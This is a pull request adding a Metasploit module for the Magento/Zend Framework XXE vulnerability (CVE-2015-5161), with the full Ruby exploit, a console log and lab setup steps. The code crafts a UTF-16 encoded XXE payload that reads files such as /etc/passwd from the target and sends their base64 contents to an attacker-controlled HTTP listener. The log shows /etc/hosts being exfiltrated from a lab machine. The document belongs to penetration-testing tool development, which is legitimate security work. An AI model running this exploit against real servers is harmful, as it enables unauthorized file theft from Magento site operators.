### PR TITLE
Add a module for the recent magento XXE

### DIFF
--- a/modules/auxiliary/gather/magento_xxe.rb
+++ b/modules/auxiliary/gather/magento_xxe.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Magento External Entity Injection',
+      'Description'    => %q{
+        This module abuses an XML External Entity Injection
+        vulnerability in Magento <= 1.9.2. More precisely, the
+        vulnerability is in the Zend Framework.
+
+        In short, the Zend Framework XXE vulnerability stems from an insufficient
+        sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP
+        applications.
+        By using certain multibyte encodings within XML, it is possible to bypass
+        the sanitisation and perform certain XXE attacks.
+
+        Since eBay Magento is based on Zend Framework and uses several of its XML
+        classes, it also inherits this XXE vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Dawid Golunski', # Vulnerability discovery and original exploit
+          'Julien (jvoisin) Voisin' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '38573' ],
+          [ 'CVE', '2015-5161'],
+          [ 'BID', '76177'],
+          [ 'URL', 'http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt' ],
+          [ 'URL', 'http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt' ],
+          [ 'URL', 'http://framework.zend.com/security/advisory/ZF2015-06' ]
+        ],
+      'DisclosureDate' => 'Oct 29 2015'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base Magento directory path", '/']),
+        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
+        OptString.new('URIPATH', [true, "The URI path to use for this exploit to get the data back", "fetch.php"]),
+        OptString.new('HTTP_DELAY', [true, "The URI path to use for this exploit to get the data back", 10]),
+      ], self.class)
+
+  end
+
+  def xml_file
+      dtd = Rex::Text.rand_text_alpha(5)
+      send = Rex::Text.rand_text_alpha(5)
+      file = Rex::Text.rand_text_alpha(5)
+      all = Rex::Text.rand_text_alpha(5)
+
+      payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+      payload << "<!ENTITY % #{all} \"<!ENTITY &#37; #{send} SYSTEM 'php://filter/read=/resource=http://"
+      payload << "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
+      payload << "/#{datastore['URIPATH']}?#{@param_name}=%#{file};'>\"> %#{all};"
+
+      payload = Rex::Text.encode_base64(payload)
+
+      final_payload = "<?xml version=\"1.0\" encoding=\"UTF-16\"?>"
+      final_payload << "<!DOCTYPE #{Rex::Text.rand_text_alpha(5)} ["
+      final_payload << "<!ENTITY % #{file} SYSTEM \"php://filter/convert.base64-encode/resource="
+      final_payload << "#{datastore['FILEPATH']}\">"
+      final_payload << "<!ENTITY % #{dtd} SYSTEM \"data://text/plain;base64,#{payload}\"> %#{dtd}; %#{send};"
+      final_payload << "]>"
+
+      return Rex::Text.to_unicode(final_payload)
+  end
+
+  def check
+      res = send_request_cgi({ 'uri' => target_uri.path })
+      if res
+          return Exploit::CheckCode::Appears if res.body =~ /201[01234] Magento/
+          return Exploit::CheckCode::Detected if res.body.include?('Magento')
+      end
+  end
+
+  def run
+    @param_name = Rex::Text.rand_text_alpha(4 + rand(4))
+    exploit
+  end
+
+  def send_payload(identifier)
+      return send_request_raw(
+          'method' => 'POST',
+          'uri'    => normalize_uri(target_uri, 'index.php/api/soap/index'),
+          'data' => xml_file
+      )
+  end
+
+  def primer
+    res = send_payload(get_uri)
+
+    if res.code != 500
+        print_warning "It seems that this instance is not vulnerable"
+    end
+
+    service.stop
+  end
+
+  def decode_answer(request)
+      query_string = request.uri_parts['QueryString']
+      param = query_string[@param_name]
+      return Rex::Text.decode_base64(param)
+  end
+
+  def on_request_uri(cli, request)
+      print_status "Got an answer from the server."
+      content =  decode_answer(request)
+      store(content)
+  end
+
+  def store(data)
+    path = store_loot("magento.file", "text/plain", rhost, data, datastore['FILEPATH'])
+    print_good("File #{datastore['FILEPATH']} found and saved to path: #{path}")
+  end
+end


### PR DESCRIPTION
This module abuses an [XML External Entity](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing) Injection vulnerability in [Magento](https://magento.com/) <= 1.9.2. More precisely, the vulnerability is in the [Zend Framework](http://framework.zend.com/).

In short, the Zend Framework XXE vulnerability stems from an insufficient  sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP applications. By using certain multibyte encodings within XML, it is possible to bypass the sanitisation and perform certain XXE attacks.

Since eBay Magento is based on Zend Framework and uses several of its XML classes, it also inherits this XXE vulnerability.

This is a straightforward port of [this](http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt) exploit.
# Console output

```
$ /opt/msf ./msfconsole

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.11.5-dev-9a0f0a7                  ]
+ -- --=[ 1505 exploits - 867 auxiliary - 251 post        ]
+ -- --=[ 434 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/gather/magento_xxe
msf auxiliary(magento_xxe) > set RPORT 8080
RPORT => 8080
msf auxiliary(magento_xxe) > set SRVHOST 192.168.1.11
SRVHOST => 192.168.1.11
msf auxiliary(magento_xxe) > setg RHOST 192.168.1.25
RHOST => 192.168.1.25
msf auxiliary(magento_xxe) > show options

Module options (auxiliary/gather/magento_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      yes       The filepath to read on the server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.25     yes       The target address
   RPORT      8080             yes       The target port
   SRVHOST    192.168.1.11     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base Magento directory path
   URIPATH    fetch.php        yes       The URI path to use for this exploit to get the data back
   VHOST                       no        HTTP server virtual host

msf auxiliary(magento_xxe) > set FILEPATH /etc/hosts
FILEPATH => /etc/hosts
msf auxiliary(magento_xxe) > run

[*] Using URL: http://192.168.1.11:8080/fetch.php
[*] Server started.
[*] 192.168.1.25     magento_xxe - Got an answer from the server.
[+] 192.168.1.25     magento_xxe - File /etc/hosts found and saved to path: /home/jvoisin/.msf4/loot/20151113173022_default_192.168.1.25_magento.file_682845.txt
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(magento_xxe) > cat /home/jvoisin/.msf4/loot/20151113173022_default_192.168.1.25_magento.file_682845.txt
[*] exec: cat /home/jvoisin/.msf4/loot/20151113173022_default_192.168.1.25_magento.file_682845.txt

127.0.0.1   localhost
127.0.1.1   debian

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
msf auxiliary(magento_xxe) >
```
# How to reproduce
1. [ ] Get the "Community Edition" of magento on [its website](https://www.magentocommerce.com/download) (Feel free to use bugmenot@mailinator.com/Password1 to log in), older or precisely  1.9.2
2. [ ] Install nginx and php-fpm with `apt install nginx php5-fpm`. This is the configuration that I used:

```
server {
    listen 0.0.0.0:8080  default;
    listen 192.168.1.25:8080;
    server_name _;
    root /var/www2/;
    index index.php;

    location = /js/index.php/x.js { rewrite ^(.*\.php)/ $1 last; }

    location / { try_files $uri $uri/ @rewrite; }
    location @rewrite { rewrite / /index.php?$args; }
    location ~ \.php$ {
    try_files $uri =404;
    fastcgi_pass unix:/var/run/php5-fpm.sock;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
    }
}
```
1. [ ] Launch metasploit, `use auxiliary/gather/magento_xxe`, set
   options
2. [ ] Get your file exfiltrated in your loot.
# Current issues
1. The XML is hand-crafted because I don't know how to Nokogiri
2. I'm quite sure that the `service.stop` in the `primer` function is
   wrong. What is the regular way to handle this?
